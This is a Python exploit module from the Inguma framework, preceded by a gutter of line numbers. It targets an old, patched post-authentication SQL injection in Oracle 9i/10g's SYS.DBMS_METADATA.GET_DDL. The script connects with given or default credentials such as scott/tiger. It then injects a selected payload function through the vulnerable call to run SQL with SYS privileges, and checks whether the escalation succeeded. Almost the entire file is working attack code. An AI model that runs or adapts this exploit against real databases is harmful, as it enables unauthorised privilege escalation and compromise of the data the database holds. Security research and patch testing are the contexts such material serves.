1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
|
#!/usr/bin/python
#
# Exploit for Oracle9i and Oracle10g prior to CPU Apr 2005
#
# Privileges needed:
#
# - CREATE SESSION
# - CREATE PROCEDURE
#
# Copyright (c) 2006, 2007 Joxean Koret
#
import os
import sys
import time
import socket
import cx_Oracle
from lib import oracleids
from lib import liboracleexploit
from lib.libexploit import CIngumaModule
name = "orainject6"
brief_description = "Oracle 9i/10g SYS.DBMS_METADATA.GET_DDL SQL Injection"
type = "exploit"
affects = ["Oracle 9i and 10g"]
description = """
The procedure SYS.DBMS_METADATA.GET_DDL of Oracle 10g R1 and R2 is vulnerable to a
post-auth SQL Injection which allows the execution of arbitrary SQL code with SYS
privileges.
"""
patch = "Fixed in 10g with CPU Apr. 2005"
category = "exploit"
discoverer = "Too many to enumerate... Reported by NGS Software, I think..."
author = "Joxean Koret <joxeankoret@yahoo.es>"
data ="""
DECLARE
V_L CLOB;
BEGIN
V_L := SYS.DBMS_METADATA.GET_DDL('''||%FUNCTION%||''','');
END;
"""
globals = ["sid", ]
class CDbmsMetadata(CIngumaModule):
target = ""
waitTime = 0
timeout = 1
exploitType = 2
wizard = False
services = {}
results = {}
user = ""
password = ""
covert = 0
sid = ""
function = "f1"
payload = None
command = None
connection = None
def connect(self):
link = "%s/%s@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=%s)(PORT=%d)))"
link += "(CONNECT_DATA=(SERVICE_NAME=%s)))"
link = link % (self.user, self.password, self.target, self.port, self.sid)
self.connection = cx_Oracle.connect(link)
self.connection.rollback()
self.connection.commit()
def readConfig(self):
if self.user != "":
pass # Username specified
elif self.dict.has_key("user"):
self.user = self.dict["user"]
else:
print "[!] Using default username 'scott'"
self.user = "scott"
if self.password != "":
pass # Password specified
elif self.dict.has_key("password"):
self.password = self.dict["password"]
else:
print "[!] Using default password 'tiger'"
self.password = "tiger"
if self.sid != "":
pass # Ignore, specified
elif self.dict.has_key("sid"):
self.sid = self.dict["sid"]
else:
print "[!] Using sid 'orcl'"
sid = "orcl"
self.sid = sid
def run(self):
self.readConfig()
# Try connecting to the instance
print "[+] Connecting to the instance %s/%s@%s:%s/%s" % (self.user, self.password, self.target, str(self.port), self.sid)
self.connect()
print "[+] Selecting payload ... "
payload = liboracleexploit.getPayload(self.dict, self.payload)
payload.user = self.user
payload.function = self.function
payload.connection = self.connection
if self.command:
payload.command = ""
print "[+] Covert level is %s" % str(self.covert)
payload.covert = self.covert
payload.run()
theCommand = ()
theCommand += (data.replace("%FUNCTION%", payload.function), )
cursor = self.connection.cursor()
for command in theCommand:
print "[+] Running command ... "
print command
try:
cursor.execute(command)
for x in cursor.fetchall():
pass
except:
print "[!] Exception:"
print sys.exc_info()[1]
if payload.verify(self.connection):
print "[+] Exploit works with selected payload."
return True
else:
print "[!] Exploit doesn't work with selected payload :("
return False
def printSummary(self):
print
|
